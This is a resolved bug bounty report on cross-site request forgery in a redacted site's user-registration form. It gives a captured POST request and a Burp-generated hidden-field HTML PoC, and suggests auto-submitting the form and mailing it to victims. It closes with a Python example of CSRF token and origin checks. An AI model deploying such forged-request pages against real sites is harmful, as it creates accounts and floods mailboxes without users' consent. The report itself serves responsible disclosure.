CSRF in https://███
Medium
Vulnerability Details
Summary:-
---------
Cross-Site Request Forgery (CSRF)
## Impact
1-The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request.
2-An attacker can cause many requests to be sent to the server (each request and the server's response to it), which can lead to DoS attacks or fill users' mailboxes with messages that the email provider's security filtering may mark as spam.
3-Sending a large number of messages may exhaust the website's subscription with its email service, or cost the site a lot of money for thousands of activation messages.
## System Host(s)
█████████
## Affected Product(s) and Version(s)
## CVE Numbers
## Steps to Reproduce
Steps:-
--------
1-go to https://█████████
2-Fill in the input fields
3-Intercept the request using Burp Suite
Request:-
-------------
```
POST /███████ HTTP/1.1
Host: ████████
Connection: close
Content-Length: 9860
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://████
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://█████
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
███
```
4-Generate the CSRF PoC code and save it as an HTML file
code:-
----------
````
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://█████████" method="POST">
<input type="hidden" name="ctl00_ToolkitScriptManager1_HiddenField" value="" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$textboxFirstName" value="df" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$Email" value="dsafhdsk@gmail.com" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$textboxLastName" value="addfsag" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$textboxConfirmEmail" value="dsafhdsk@gmail.com" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$textboxAddress1" value="cairo" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$textboxPhoneNumber" value="████████" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$textboxAddress2" value="cairo" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$textboxCellPhone" value="███████" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$textboxCity" value="cairo" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$textboxOrganizationName" value="dfs" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$dropDownListState" value="KS" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$textboxJobTitle" value="dsf" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$textboxZipCode" value="11311" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$dropDownListSector" value="Federal" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$UserName" value="cairoer55" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$Password" value="Asdfgh123456@" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$ConfirmPassword" value="Asdfgh123456@" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$Question" value="What was your high school mascot?" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$Answer" value="cairo" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$CreateUserStepContainer$checkBoxAcceptDisclaimer" value="on" />
<input type="hidden" name="ctl00$masterContentHolder$wizardCreateNewUser$__CustomNav0$StepNextButton" value="Create User" />
<input type="hidden" name="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" value="" />
<input type="hidden" name="__LASTFOCUS" value="" />
<input type="hidden" name="__VIEWSTATE" value="████" />
<input type="hidden" name="__VIEWSTATEGENERATOR" value="6D58E96E" />
<input type="hidden" name="__VIEWSTATEENCRYPTED" value="" />
<input type="hidden" name="__EVENTVALIDATION" value="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" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
````
5-Open it in another browser and submit it; as you can see, the response is:
```
Your account has been created, but before you can login you must first verify your email address. A message has been sent to the email address you specified. Please check your email inbox and follow the instructions in that email to verify your account.
```
You can add an auto-submit script to the code so that it is executed without any action by the victim;
the victim only has to click on the HTML file, which can be sent to him via Facebook or email.
## Suggested Mitigation/Remediation Actions
Add a CSRF token to the form.
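One way to implement the token check this report asks for, as an added example that is not code from the report or from the affected application: a token bound to a pre-login visitor cookie, plus a check of the `Origin` and `Sec-Fetch-Site` headers visible in the captured request. The cookie name `visitor_id`, the field name `csrf_token`, the origin `https://app.example` and the sample requests are assumptions constructed for illustration.

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)      # per-deployment secret (generated here for the example)
TRUSTED_ORIGIN = "https://app.example"    # placeholder for the site's own origin


def _mac(visitor_id: str, nonce: str) -> str:
    msg = f"{visitor_id}:{nonce}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def issue_token(visitor_id: str) -> str:
    """Value for a hidden form field, bound to the server-issued visitor cookie."""
    nonce = secrets.token_hex(16)
    return f"{nonce}.{_mac(visitor_id, nonce)}"


def token_valid(visitor_id: str, token: str) -> bool:
    nonce, sep, sent = token.partition(".")
    if not visitor_id or not sep:
        return False  # no cookie or malformed/missing token
    return hmac.compare_digest(_mac(visitor_id, nonce).encode(), sent.encode())


def same_origin(headers: dict) -> bool:
    """Defence in depth; clients that omit these headers fall through to the token."""
    if headers.get("Sec-Fetch-Site", "same-origin") != "same-origin":
        return False
    return headers.get("Origin", TRUSTED_ORIGIN) == TRUSTED_ORIGIN


def accept_registration(headers: dict, cookies: dict, form: dict) -> bool:
    visitor_id = cookies.get("visitor_id", "")
    return same_origin(headers) and token_valid(visitor_id, form.get("csrf_token", ""))


# Constructed sample requests (not taken from the report).
victim_cookie = {"visitor_id": secrets.token_hex(16)}
attacker_cookie = {"visitor_id": secrets.token_hex(16)}
site_headers = {"Origin": TRUSTED_ORIGIN, "Sec-Fetch-Site": "same-origin"}
forged_headers = {"Origin": "null", "Sec-Fetch-Site": "cross-site"}

legit_form = {"UserName": "alice", "csrf_token": issue_token(victim_cookie["visitor_id"])}
forged_form = {"UserName": "cairoer55"}  # form without any token field
replayed_form = {"UserName": "x", "csrf_token": issue_token(attacker_cookie["visitor_id"])}
```

Binding the token to the visitor cookie matters here because the PoC's replayed `__VIEWSTATE` and `__EVENTVALIDATION` values were accepted from another browser; a token issued to one visitor must fail when it arrives with a different visitor's cookie.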
Report Stats
- Report ID: 1090838
- State: Closed
- Substate: resolved
- Upvotes: 14